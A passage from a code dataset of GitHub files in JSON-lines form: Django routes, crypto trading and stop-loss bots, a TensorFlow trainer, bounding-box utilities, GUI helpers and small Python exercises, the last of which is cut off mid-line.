Collection_API_ReturnViewSet.as_view(), name=\"CollectionAPI\"),\n #path(\"testing/\", views.testAPI.as_view(), name=\"Testing\"),\n #path(\"author_book_detail\", Author_Book_DetailViewSet.as_view(), name=\"AuthorBookDetail\"),\n]\n","repo_name":"rdmullins/rm-ereader-backend","sub_path":"e_reader/ereader/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1784910433","text":"import sys\nimport os\nimport sys\nsys.path.append('.')\nfrom ccxtbt import CCXTStore\nimport backtrader as bt\nfrom utils.helper import init_env, get_env\nimport logging.config\nimport time\nfrom tools.telegram import Telegram\nfrom datetime import datetime, timedelta\n\n\nclass OneBuy(bt.Strategy):\n\n def __init__(self):\n self.m = 0\n\n def log(self, txt, dt=None):\n dt = dt or self.datas[0].datetime.datetime(0)\n print(f'{dt} {txt}') # Print date and close\n\n def notify_data(self, data, status, *args, **kwargs):\n dn = data._name\n msg = f'{dn} Data Status: {data._getstatusname(status)}'\n self.log(msg, datetime.utcnow())\n if data._getstatusname(status) == 'LIVE':\n self.live_data = True\n else:\n self.live_data = False\n\n def notify_order(self, order):\n self.log(\n f\"Order: {order.ordtypename()}, Status: {order.getstatusname()}, Price: {order.executed.price}, Size: {order.executed.size}, Alive: {order.alive()}\"\n )\n\n def next(self):\n if not self.live_data: return\n if self.m == 0:\n data = self.datas[0]\n self.buy(data)\n self.m = 1\n self.log(\"buy\")\n\n\nif __name__ == '__main__':\n\n init_env()\n logging.config.fileConfig(\"logging.ini\")\n logging.Formatter.converter = time.gmtime #utc\n cerebro = bt.Cerebro(quicknotify=True)\n\n # Add the strategy\n cerebro.addstrategy(OneBuy)\n cerebro.addanalyzer(Telegram)\n\n # Create our store\n config = { 'apiKey': get_env('B_APIKEY'), 'secret': get_env('B_SECRET'), 'enableRateLimit': True }\n if get_env(\"PROXY\") == '1':\n config['requests_trust_env'] = True\n\n # IMPORTANT NOTE - Kraken (and some other exchanges) will not return any values\n # for get cash or value if You have never held any BNB coins in your account.\n # So switch BNB to a coin you have funded previously if you get errors\n store = CCXTStore(exchange='binanceusdm', currency='USDT', config=config, retries=10, debug=False)\n\n # Get the broker and pass any kwargs if needed.\n # ----------------------------------------------\n # Broker mappings have been added since some exchanges expect different values\n # to the defaults. Case in point, Kraken vs Bitmex. NOTE: Broker mappings are not\n # required if the broker uses the same values as the defaults in CCXTBroker.\n broker_mapping = {\n 'order_types': {\n bt.Order.Market: 'market',\n bt.Order.Limit: 'limit',\n bt.Order.Stop: 'stop-loss', #stop-loss for kraken, stop for bitmex\n bt.Order.StopLimit: 'stop limit'\n },\n 'mappings': {\n 'closed_order': {\n 'key': 'status',\n 'value': 'closed'\n },\n 'canceled_order': {\n 'key': 'status',\n 'value': 'canceled'\n }\n }\n }\n\n broker = store.getbroker(broker_mapping=broker_mapping)\n cerebro.setbroker(broker)\n\n # Get our data\n # Drop newest will prevent us from loading partial data from incomplete candles\n hist_start_date = datetime.utcnow() - timedelta(minutes=(220 + 6) * 5)\n data = store.getdata(\n dataname='ETC/USDT',\n name=\"ETCUSDT\",\n timeframe=bt.TimeFrame.Minutes,\n fromdate=hist_start_date,\n compression=5,\n ohlcv_limit=99999,\n drop_newest=True,\n # historical=True\n )\n\n # Add the feed\n cerebro.adddata(data)\n\n cerebro.broker.setcommission(commission=0.0004, margin=0.1, mult=1.0)\n cerebro.addsizer(bt.sizers.FixedSize, stake=1)\n\n # Run the strategy\n cerebro.run()","repo_name":"xiangxn/backtrader-example","sub_path":"tests/test_live.py","file_name":"test_live.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"16364557095","text":"import sys \ninput = sys.stdin.readline\nn = int(input()) # 토핑 종류의 수 n\na, b = map(int, input().split()) # 도우의 가격 a , 토핑의 가격 b\nc = int(input()) # 도우의 열량 c\ntopping = [] # 토핑의 열량 리스트\nfor _ in range(n):\n topping.append(int(input()))\ntopping.sort(reverse=True) # 내림차순 정렬\n\nresult = c / a # 토핑을 0개 선택했을 경우\nfor i in range(1, len(topping)+1): # 토핑을 1개 이상 선택했을 경우\n calory = c + sum(topping[0:i]) # 피자의 열량\n price = a + (b*i) # 피자의 가격\n if calory / price > result: # max인지 판단\n result = calory / price\n else:\n break\n \nprint(int(result))","repo_name":"letmeloveyou82/Algorithm","sub_path":"Python/BOJ/그리디/5545.py","file_name":"5545.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10592226082","text":"from core.base_train import BaseTrain\nfrom tqdm import tqdm\nfrom misc.utils import SetFromFlat, GetFlat, unflatten, flatten, numel\nimport numpy as np\nimport tensorflow as tf\n\n\nclass Trainer(BaseTrain):\n def __init__(self, sess, model, train_loader, test_loader, config, logger):\n super(Trainer, self).__init__(sess, model, config, logger)\n self.train_loader = train_loader\n self.test_loader = test_loader\n\n self.get_params = GetFlat(self.sess, self.model.params_net)\n self.set_params = SetFromFlat(self.sess, self.model.params_net)\n self.unflatten = unflatten(self.model.params_net)\n self.norm_list = []\n\n self.summary_op = tf.summary.merge_all()\n\n def init_kfac(self):\n self.logger.info('Roger Initialization!')\n self.model.optim._fisher_est.reset(self.sess)\n\n for itr, (x, y) in enumerate(self.train_loader):\n feed_dict = {\n self.model.inputs: x,\n # self.model.targets: y,\n self.model.is_training: True\n }\n self.sess.run(self.model.optim.init_cov_op, feed_dict=feed_dict)\n self.model.optim._fisher_est.rescale(self.sess, 1. / len(self.train_loader))\n\n # inverse\n if self.model.inv_update_op is not None:\n self.sess.run(self.model.inv_update_op)\n\n self.logger.info('Done Roger Initialization!')\n\n def train(self):\n if self.config.roger_init:\n self.init_kfac()\n for cur_epoch in range(self.config.epoch):\n self.logger.info('epoch: {}'.format(int(cur_epoch)))\n self.train_epoch()\n self.test_epoch()\n\n if cur_epoch % 100 == 0:\n self.model.save(self.sess)\n\n def train_epoch(self):\n loss_list = []\n acc_list = []\n\n for itr, (x, y) in enumerate(tqdm(self.train_loader)):\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: True,\n }\n self.sess.run(self.model.train_op, feed_dict=feed_dict)\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n\n if cur_iter % self.config.get('TCov', 10) == 0 and self.model.cov_update_op is not None:\n self.sess.run(self.model.cov_update_op, feed_dict=feed_dict)\n\n if cur_iter % self.config.get('TInv', 100) == 0 and self.model.inv_update_op is not None:\n self.sess.run(self.model.inv_update_op)\n\n for itr, (x, y) in enumerate(self.train_loader):\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: True\n }\n\n loss, acc = self.sess.run(\n [self.model.loss, self.model.acc],\n feed_dict=feed_dict)\n loss_list.append(loss)\n acc_list.append(acc)\n\n avg_loss = np.mean(loss_list)\n avg_acc = np.mean(acc_list)\n self.logger.info(\"[Train] loss: %5.4f | accuracy: %5.4f\"%(float(avg_loss), float(avg_acc)))\n\n l2_norm = self.sess.run(self.model.l2_norm)\n self.logger.info(\"l2_norm: %5.4f\"%(float(l2_norm)))\n\n # summarize\n summaries_dict = dict()\n summaries_dict['train_loss'] = avg_loss\n summaries_dict['train_acc'] = avg_acc\n summaries_dict['l2_norm'] = l2_norm\n\n # summarize\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n self.summarizer.summarize(cur_iter, summaries_dict=summaries_dict)\n\n def test_epoch(self):\n loss_list = []\n acc_list = []\n for (x, y) in self.test_loader:\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: False\n }\n loss, acc = self.sess.run([self.model.loss, self.model.acc], feed_dict=feed_dict)\n loss_list.append(loss)\n acc_list.append(acc)\n\n avg_loss = np.mean(loss_list)\n avg_acc = np.mean(acc_list)\n self.logger.info(\"[Test] loss: %5.4f | accuracy: %5.4f\"%(float(avg_loss), float(avg_acc)))\n\n # summarize\n summaries_dict = dict()\n summaries_dict['test_loss'] = avg_loss\n summaries_dict['test_acc'] = avg_acc\n\n # summarize\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n self.summarizer.summarize(cur_iter, summaries_dict=summaries_dict)\n\n\n","repo_name":"gd-zhang/Weight-Decay","sub_path":"core/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"}
+{"seq_id":"70700699047","text":"from PySide import QtCore, QtGui\nfrom functools import partial\n\ndef add_spinbox(label, parent_layout, min=None, max=None, default=None, double_spinbox=False):\n \n horiz_layout = QtGui.QHBoxLayout()\n parent_layout.addLayout(horiz_layout)\n\n label = QtGui.QLabel(label)\n label.setMinimumWidth(100)\n horiz_layout.addWidget(label)\n\n horiz_layout.addStretch()\n\n spinbox = QtGui.QSpinBox() if not double_spinbox else QtGui.QDoubleSpinBox()\n\n if min:\n spinbox.setMinimum(min)\n if max:\n spinbox.setMaximum(max)\n if default:\n spinbox.setValue(default)\n\n\n horiz_layout.addWidget(spinbox)\n spinbox.setMinimumWidth(100)\n\n return spinbox\n\n\ndef add_populate_lineedit(label, parent_layout, callback=None, kwargs={}):\n \n horiz_layout = QtGui.QHBoxLayout()\n parent_layout.addLayout(horiz_layout)\n\n button = QtGui.QPushButton(label)\n button.setMinimumWidth(80)\n horiz_layout.addWidget(button)\n\n lineedit = QtGui.QLineEdit()\n horiz_layout.addWidget(lineedit)\n lineedit.setMinimumWidth(100)\n\n \n if callback is not None:\n \n kwargs['lineedit'] = lineedit\n button.clicked.connect(partial(callback, **kwargs))\n\n return lineedit","repo_name":"EriLee/petfactory_maya_scripts","sub_path":"petfactory/gui/simple_widget.py","file_name":"simple_widget.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"72271213287","text":"from typing import Optional, Tuple, Union\n\nimport numpy as np\nimport torch\n\nfrom cap.core.point_geometry import coor_transformation\n\n__all__ = [\n \"box_center_to_corner\",\n \"box_corner_to_center\",\n \"bbox_overlaps\",\n \"get_bev_bbox\",\n \"zoom_boxes\",\n]\n\n\ndef box_center_to_corner(\n bboxes: torch.Tensor,\n split: Optional[bool] = False,\n legacy_bbox: Optional[bool] = False,\n): # noqa: D205,D400\n \"\"\"\n Convert bounding box from center format (xcenter, ycenter,\n width, height) to corner format (x_low, y_low, x_high, y_high)\n\n Args:\n bboxes (torch.Tensor): Shape is (..., 4) represents bounding boxes.\n split: (:obj:`bool`, optional): Whether to split the final output to\n for (..., 1) tensors, or keep the (..., 4) original output.\n Default to False.\n legacy_bbox: (:obj:`bool`, optional): Whether the boxes are decoded\n in legacy manner (should add one to bottom or right coordinate\n before using) or not. Default to False.\n \"\"\"\n\n border = int(legacy_bbox)\n cx, cy, w, h = torch.split(bboxes, 1, dim=-1)\n x1 = cx - (w - border) * 0.5\n y1 = cy - (h - border) * 0.5\n x2 = x1 + w - border\n y2 = y1 + h - border\n\n if split:\n return x1, y1, x2, y2\n else:\n return torch.cat([x1, y1, x2, y2], dim=-1)\n\n\ndef box_corner_to_center(\n bboxes: torch.Tensor,\n split: Optional[bool] = False,\n legacy_bbox: Optional[bool] = False,\n): # noqa: D205,D400\n \"\"\"\n Convert bounding box from corner format (x_low, y_low, x_high, y_high)\n to center format (xcenter, ycenter, width, height)\n\n Args:\n bboxes (torch.Tensor): Shape is (..., 4) represents bounding boxes.\n split: (:obj:`bool`, optional): Whether to split the final output to\n for (..., 1) tensors, or keep the (..., 4) original output.\n Default to False.\n legacy_bbox: (:obj:`bool`, optional): Whether the boxes are decoded\n in legacy manner (should add one to bottom or right coordinate\n before using) or not. Default to False.\n \"\"\"\n\n border = int(legacy_bbox)\n x1, y1, x2, y2 = torch.split(bboxes, 1, dim=-1)\n width = x2 - x1 + border\n height = y2 - y1 + border\n cx = x1 + (width - border) * 0.5\n cy = y1 + (height - border) * 0.5\n\n if split:\n return cx, cy, width, height\n else:\n return torch.cat([cx, cy, width, height], dim=-1)\n\n\ndef bbox_overlaps(\n bboxes1: Union[torch.tensor, np.ndarray],\n bboxes2: Union[torch.tensor, np.ndarray],\n mode: Optional[str] = \"iou\",\n is_aligned: Optional[bool] = False,\n eps: Optional[float] = 1e-6,\n):\n \"\"\"\n Calculate overlap between two set of bboxes.\n\n Args:\n bboxes1 (Tensor or np.ndarray):\n shape (m, 4) in format or empty.\n bboxes2 (Tensor or np.ndarray):\n shape (n, 4) in format or empty.\n mode (str): \"iou\" (intersection over union), \"iof\" (intersection over\n foreground) or \"giou\" (generalized intersection over union).\n Default \"iou\".\n is_aligned (bool, optional): If True, then m and n must be equal.\n Default False.\n eps (float, optional): A value added to the denominator for numerical\n stability. Default 1e-6.\n\n Returns:\n Tensor: shape (m, n) if ``is_aligned `` is False else shape (m,)\n \"\"\"\n\n assert isinstance(bboxes1, type(bboxes2))\n is_ndarray = False\n if isinstance(bboxes1, np.ndarray):\n is_ndarray = True\n bboxes1 = torch.from_numpy(bboxes1)\n bboxes2 = torch.from_numpy(bboxes2)\n\n assert mode in [\"iou\", \"iof\", \"giou\"], f\"Unsupported mode {mode}\"\n # Either the boxes are empty or the length of boxes' last dimension is 4\n assert bboxes1.size(-1) == 4 or bboxes1.size(0) == 0\n assert bboxes2.size(-1) == 4 or bboxes2.size(0) == 0\n\n rows = bboxes1.size(0)\n cols = bboxes2.size(0)\n\n if is_aligned:\n assert rows == cols\n\n if rows * cols == 0:\n if is_aligned:\n return bboxes1.new_zeros((rows,))\n else:\n return bboxes1.new_zeros((rows, cols))\n\n area1 = (bboxes1[..., 2] - bboxes1[..., 0]) * (\n bboxes1[..., 3] - bboxes1[..., 1]\n )\n area2 = (bboxes2[..., 2] - bboxes2[..., 0]) * (\n bboxes2[..., 3] - bboxes2[..., 1]\n )\n\n if is_aligned:\n lt = torch.max(bboxes1[..., :2], bboxes2[..., :2]) # [rows, 2]\n rb = torch.min(bboxes1[..., 2:], bboxes2[..., 2:]) # [rows, 2]\n\n wh = (rb - lt).clamp(min=0)\n overlap = wh[..., 0] * wh[..., 1]\n\n if mode in [\"iou\", \"giou\"]:\n union = area1 + area2 - overlap\n else:\n union = area1\n if mode == \"giou\":\n enclosed_lt = torch.min(bboxes1[..., :2], bboxes2[..., :2])\n enclosed_rb = torch.max(bboxes1[..., 2:], bboxes2[..., 2:])\n else:\n lt = torch.max(\n bboxes1[:, None, :2], bboxes2[None, :, :2]\n ) # [rows, cols, 2]\n rb = torch.min(\n bboxes1[:, None, 2:], bboxes2[None, :, 2:]\n ) # [rows, cols, 2]\n wh = (rb - lt).clamp(min=0)\n overlap = wh[..., 0] * wh[..., 1]\n if mode in [\"iou\", \"giou\"]:\n union = area1[..., None] + area2[..., None, :] - overlap\n else:\n union = area1[..., None]\n if mode == \"giou\":\n enclosed_lt = torch.min(bboxes1[:, None, :2], bboxes2[None, :, :2])\n enclosed_rb = torch.max(bboxes1[:, None, 2:], bboxes2[None, :, 2:])\n\n eps = union.new_tensor([eps])\n union = torch.max(union, eps)\n ious = overlap / union\n if mode in [\"iou\", \"iof\"]:\n return ious if not is_ndarray else ious.numpy()\n # calculate gious\n enclose_wh = (enclosed_rb - enclosed_lt).clamp(min=0)\n enclose_area = enclose_wh[..., 0] * enclose_wh[..., 1]\n enclose_area = torch.max(enclose_area, eps)\n gious = ious - (enclose_area - union) / enclose_area\n return gious if not is_ndarray else gious.numpy()\n\n\n# =============================================================================\n# The following methods are mostly used in lidar 3d box processing.\n# =============================================================================\n\n\ndef corners_nd(\n dims: np.ndarray, origin: Union[Tuple[float, ...], float] = 0.5\n):\n \"\"\"Generate relative box corners based on length per dim and origin point.\n\n Args:\n dims (np.ndarray): [N, ndim] tensor. Box size in each dimension.\n origin ([Union[Tuple[float, ...], float]):\n origin point relative to the smallest point. Defaults to 0.5.\n\n Returns:\n corners (np.ndarray): [N, 2**ndim, ndim] sized tensor of corners.\n point layout example: (2d) x0y0, x0y1, x1y0, x1y1;\n (3d) x0y0z0, x0y0z1, x0y1z0, x0y1z1, x1y0z0, x1y0z1, x1y1z0, x1y1z1\n where x0 < x1, y0 < y1, z0 < z1\n \"\"\"\n ndim = int(dims.shape[1])\n corners_norm = np.stack(\n np.unravel_index(np.arange(2 ** ndim), [2] * ndim), axis=1\n ).astype(dims.dtype)\n # now corners_norm has format: (2d) x0y0, x0y1, x1y0, x1y1\n # (3d) x0y0z0, x0y0z1, x0y1z0, x0y1z1, x1y0z0, x1y0z1, x1y1z0, x1y1z1\n # so need to convert to a format which is convenient to do other computing.\n # for 2d boxes, format is clockwise start with minimum point\n # for 3d boxes, please draw lines by your hand.\n if ndim == 2:\n # generate clockwise box corners\n corners_norm = corners_norm[[0, 1, 3, 2]]\n elif ndim == 3:\n corners_norm = corners_norm[[0, 1, 3, 2, 4, 5, 7, 6]]\n corners_norm = corners_norm - np.array(origin, dtype=dims.dtype)\n corners = dims.reshape([-1, 1, ndim]) * corners_norm.reshape(\n [1, 2 ** ndim, ndim]\n )\n return corners\n\n\ndef rotation_2d(points: np.ndarray, angles: float):\n \"\"\"Rotate 2d points based on origin point clockwise when angle positive.\n\n Args:\n points (float array, shape=[N, point_size, 2]): points to be rotated.\n angles (float array, shape=[N]): rotation angle.\n\n Returns:\n float array: same shape as points\n \"\"\"\n rot_sin = np.sin(angles)\n rot_cos = np.cos(angles)\n rot_mat_T = np.stack([[rot_cos, -rot_sin], [rot_sin, rot_cos]])\n return np.einsum(\"aij,jka->aik\", points, rot_mat_T)\n\n\ndef center_to_corner_box2d(\n centers: np.ndarray,\n dims: np.ndarray,\n angles: Optional[np.ndarray] = None,\n origin: float = 0.5,\n):\n \"\"\"Convert Kitti-style locations, dimensions and angles to corners.\n\n format: center(xy), dims(xy), angles(clockwise when positive)\n\n Args:\n centers (float array, shape=[N, 2]): locations in kitti label file.\n dims (float array, shape=[N, 2]): dimensions in kitti label file.\n angles (float array, shape=[N]): rotation_y in kitti label file.\n\n Returns:\n np.ndarray: corner representation of boxes.\n \"\"\"\n # 'length' in kitti format is in x axis.\n # xyz(hwl)(kitti label file)<->xyz(lhw)(camera)<->z(-x)(-y)(wlh)(lidar)\n # center in kitti format is [0.5, 1.0, 0.5] in xyz.\n corners = corners_nd(dims, origin=origin)\n # corners: [N, 4, 2]\n if angles is not None:\n corners = rotation_2d(corners, angles)\n corners += centers.reshape([-1, 1, 2])\n return corners\n\n\ndef zoom_boxes(boxes: torch.Tensor, roi_wh_zoom_scale: Tuple[float, float]):\n \"\"\"Zoom boxes.\n\n Args:\n boxes: shape (m, 4) in format.\n roi_wh_zoom_scale: (w_scale, h_scale).\n\n Returns:\n torch.Tensor: zoomed bboxes.\n \"\"\"\n boxes = boxes[..., :4]\n boxes_w = boxes[..., 2] - boxes[..., 0]\n boxes_h = boxes[..., 3] - boxes[..., 1]\n\n w_bias = 0.5 * (roi_wh_zoom_scale[0] - 1) * boxes_w\n h_bias = 0.5 * (roi_wh_zoom_scale[1] - 1) * boxes_h\n\n return torch.stack(\n [\n boxes[..., 0] - w_bias,\n boxes[..., 1] - h_bias,\n boxes[..., 2] + w_bias,\n boxes[..., 3] + h_bias,\n ],\n dim=-1,\n )\n\n\ndef minmax_to_corner_2d(minmax_box: np.ndarray):\n \"\"\"Convert min-max representation of a box into corner representation.\n\n Args:\n minmax_box (np.ndarray): [N, 2*ndim] box. ndim indicates whether it is\n a 2-d box or a 3-d box.\n\n Returns:\n np.ndarray: corner representation of a boxes.\n \"\"\"\n ndim = minmax_box.shape[-1] // 2\n center = minmax_box[..., :ndim]\n dims = minmax_box[..., ndim:] - center\n return center_to_corner_box2d(center, dims, origin=0.0)\n\n\ndef get_bev_bbox(coordinate, size, yaw):\n\n size = np.clip(size, a_min=1, a_max=None)\n if len(coordinate) == 0:\n return np.zeros([0, 4, 2])\n\n corners = size / 2\n corners = np.stack(\n [\n corners,\n corners * np.array([1, -1]),\n corners * np.array([-1, -1]),\n corners * np.array([-1, 1]),\n ],\n axis=-2,\n )\n bev_bbox = coor_transformation(corners, yaw[:, None], coordinate[:, None])\n\n return bev_bbox\n","repo_name":"xingyun-xy/cap","sub_path":"cap/core/box_utils.py","file_name":"box_utils.py","file_ext":"py","file_size_in_byte":10989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7522849896","text":"#CTI-110\r\n#M3T1 - Areas of Rectangle\r\n#Oliver Hollis\r\n#11-09-2017\r\n#\r\n#Input the lenght and width of Rectangles\r\nrect_lenght1 = int(input('Enter the lenght of Rectangle 1: '))\r\nrect_width1 = int(input('Enter the lenght of Rectangle 1: '))\r\n\r\nrect_lenght2 = int(input('Enter the lenght of Rectangle 2: '))\r\nrect_width2 = int(input('Enter the lenght of Rectangle 2: '))\r\n\r\n# Caculate the Areas of the Rectangles\r\narea1 = rect_lenght1 * rect_width1\r\narea2 = rect_lenght2 * rect_width2\r\n\r\n# Determine which rectangle has a greater area\r\nif area1 > area2:\r\n print('Rectangle 1 has a greater area than Reactangle 2')\r\nelif area1 < area2:\r\n print('Rectangle 2 has a greater area than Reactangle 1')\r\nelse:\r\n print('Both have the same area')\r\n \r\n","repo_name":"holliso/cti110","sub_path":"M3T1_Areas_Rectangles_holliso.py","file_name":"M3T1_Areas_Rectangles_holliso.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21757512180","text":"import sys\nimport time\nimport traceback\n\nimport requests\n\nfrom library import stop_signal, sat, sell_limit_stop_loss, setup_logger, SellAsset, AccountHoldingZero\nfrom binance.client import Client as BinanceClient\n\nname = \"VRA\"\nstop_price_in_satoshi = 6.3\n\nstop_price = stop_price_in_satoshi * sat\n\nsell_asset_kucoin = SellAsset(\"kucoin\", name, stop_price, True, BinanceClient.KLINE_INTERVAL_5MINUTE)\n\nlogger = setup_logger(sell_asset_kucoin.name)\nlogger.info(\"Starting {} stop-loss maker on {}\".format(sell_asset_kucoin.market, sell_asset_kucoin.exchange))\nlogger.info(\"Stop price is set up to : {:.8f} BTC\".format(stop_price))\n\nwhile 1:\n try:\n stop = stop_signal(sell_asset_kucoin.exchange, sell_asset_kucoin.market, sell_asset_kucoin.ticker, stop_price, 4)\n if stop:\n sell_limit_stop_loss(sell_asset_kucoin.market, sell_asset_kucoin)\n logger.info(\"Stop-loss LIMIT order has been made on {}, exiting\".format(sell_asset_kucoin.exchange))\n sys.exit(0)\n time.sleep(40)\n except AccountHoldingZero as warn:\n logger.warning(warn)\n sys.exit(\"Exit\")\n except Exception as err:\n if isinstance(err, requests.exceptions.ConnectionError) or isinstance(err, requests.exceptions.ReadTimeout):\n logger.error(\"Connection problem...\")\n else:\n traceback.print_tb(err.__traceback__)\n logger.exception(err.__traceback__)","repo_name":"sroziewski/trading-bot","sub_path":"stop_loss_kucoin.py","file_name":"stop_loss_kucoin.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12165499376","text":"\"\"\"Utility functions for copying and archiving files and directory trees.\n\nXXX The functions here don't copy the resource fork or other metadata on Mac.\"\"\"\nimport shutil\n\n\ndef unpack(archive_path, path_to_unpack):\n \"\"\"Unpack archive to specified path.\"\"\"\n try:\n shutil.unpack_archive(archive_path, path_to_unpack)\n except ValueError:\n print('Not registered extension')\n","repo_name":"SiracencoSerghei/my-python-tasks","sub_path":"working_with_files/files_14_unzip.py","file_name":"files_14_unzip.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1495794653","text":"#coding:utf-8\n#data不包含name的\nclass StartRecording():\n name = \"camera._startPreview\"\n def __init__(self,stimime=None,stiwidth=None,stiheight=None,stimode=None,stiframerate=None,stibirate=None,\n orimime=None, oriwidth=None, oriheight=None,oriframerate=None,oribirate=None, saveori=None,logmode=None,\n audmime=None,audbitraite=None,samplerate=None,sampleformat=None,\n channellayout=None,timeenable=None,timeinterval=None,duration=None,fileoverride=None,\n storagepath=None,stabilization=None,**kw):\n\n self.data = {\"audio\": {\"channelLayout\": channellayout, \"bitrate\": audbitraite, \"samplerate\": samplerate,\"mime\": audmime, \"sampleFormat\": sampleformat},\n \"origin\": {\"mime\": orimime, \"width\": oriwidth,\"height\": oriheight,\"saveOrigin\": saveori,\"bitrate\":oribirate,\"framerate\":oriframerate,'logMode':logmode},\n 'storageSpeedTest':'false'}\n if(stimime and stiwidth and stiheight and stimode and stiframerate and stibirate):\n self.data['stiching']= {\"mime\": stimime, \"width\": stiwidth, \"height\": stiheight, \"mode\": stimode,\"framerate\":stiframerate,\"bitrate\":stibirate}\n if(timeenable and timeinterval):\n self.data['timelapse']={\"enable\":timeenable, \"interval\":timeinterval}\n if(duration):\n self.data['duration']=duration\n if (fileoverride):\n self.data['fileOverride'] = fileoverride\n if (storagepath):\n self.data['storagePath'] = storagepath\n if (stabilization):\n self.data['stabilization'] = stabilization\n\n for key, value in kw.items():\n '''\n if (key not in self.data['parameters']):\n self.data['parameters'][key] = value\n '''\n if (key not in self.data.keys()):\n self.data[key] = value\n\n def getJsonData(self):\n return self.data\n\nif __name__=='__main__':\n s=StartRecording(stimime='h265')","repo_name":"somesomeprincess/prointerface","sub_path":"model/StartRecording.py","file_name":"StartRecording.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"40117093053","text":"MENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"milk\": 0,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nprofit = 0\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n}\n\n\ndef payment(MENU):\n \"\"\"ask the user to insert coin shows the actual amount and verify if is enough for the drink\"\"\"\n total_coins = 0\n quarter = 0.25\n dime = 0.10\n nikel = 0.05\n penny = 0.01\n price_product = MENU[\"cost\"]\n print(\"Please insert coins\")\n quarter_insert = int(input(\"How many quarters: \"))\n total_quarter = quarter_insert * quarter\n total_coins += total_quarter\n print(f\"The total insert is {total_coins}\")\n dime_insert = int(input(\"How many dimes: \"))\n total_dimes = dime_insert * dime\n total_coins += total_dimes\n print(f\"The total insert is {total_coins}\")\n nikel_insert = int(input(\"How many nikel: \"))\n total_nikel = nikel_insert * nikel\n total_coins += total_nikel\n print(f\"The total insert is {total_coins}\")\n penny_insert = int(input(\"How many penny: \"))\n total_penny = penny_insert * penny\n total_coins += total_penny\n print(f\"The total insert is {total_coins}\")\n if total_coins >= MENU[\"cost\"]:\n print(\"Here is your drink enjoy!!\")\n if total_coins > MENU[\"cost\"]:\n change = round(total_coins - MENU[\"cost\"], 2)\n print(f\"You're change : {change}\")\n profit = total_coins - change\n return profit\n else:\n print(f\"You insert {total_coins}, the prize is {price_product}\\n I give back your money\")\n profit = 0\n return profit\n\n\ndef resources_check(water, milk, coffee, MENU):\n \"\"\"Check if is enough ingredients in the coffee machine\"\"\"\n if water < MENU[\"ingredients\"][\"water\"]:\n print(\"Sorry there is not enough water\")\n check = False\n return check\n elif coffee < MENU[\"ingredients\"][\"coffee\"]:\n print(\"Sorry there is not enough coffee\")\n check = False\n return check\n elif milk < MENU[\"ingredients\"][\"milk\"]:\n print(\"Sorry there is not enough coffee\")\n check = False\n return check\n else:\n check = True\n return check\n\nwater = resources[\"water\"]\nmilk = resources[\"milk\"]\ncoffee = resources[\"coffee\"]\nmoney = 0\non = True\nwhile on:\n order = input(\"What do you like? espresso, latte, cappuccino,prize: \").lower()\n # TODO print the report\n\n if order == \"report\":\n print(f\"Water: {water}\\nMilk: {milk} \\nCoffee: {coffee}\\nMoney:$ {money}\")\n elif order == \"off\":\n on = False\n elif order == \"price\":\n print(\"Espresso price:$\", MENU[\"espresso\"][\"cost\"], \"\\n\", \"Latte price:$\", MENU[\"latte\"][\"cost\"], \"\\n\",\n \"Cappuccino price:$\", MENU[\"cappuccino\"][\"cost\"])\n elif order == \"espresso\":\n is_enough = resources_check(water, milk, coffee, MENU[\"espresso\"])\n if is_enough:\n water -= MENU[\"espresso\"][\"ingredients\"][\"water\"]\n coffee -= MENU[\"espresso\"][\"ingredients\"][\"coffee\"]\n money_es = payment(MENU[\"espresso\"])\n money += money_es\n elif order == \"latte\":\n is_enough = resources_check(water, milk, coffee, MENU[\"latte\"])\n if is_enough:\n water -= MENU[\"latte\"][\"ingredients\"][\"water\"]\n milk -= MENU[\"latte\"][\"ingredients\"][\"milk\"]\n coffee -= MENU[\"latte\"][\"ingredients\"][\"coffee\"]\n money_la = payment(MENU[\"latte\"])\n money += money_la\n elif order == \"cappuccino\":\n is_enough = resources_check(water, milk, coffee, MENU[\"cappuccino\"])\n if is_enough:\n water -= MENU[\"cappuccino\"][\"ingredients\"][\"water\"]\n milk -= MENU[\"cappuccino\"][\"ingredients\"][\"milk\"]\n coffee -= MENU[\"cappuccino\"][\"ingredients\"][\"coffee\"]\n money_cap = payment(MENU[\"cappuccino\"])\n money += 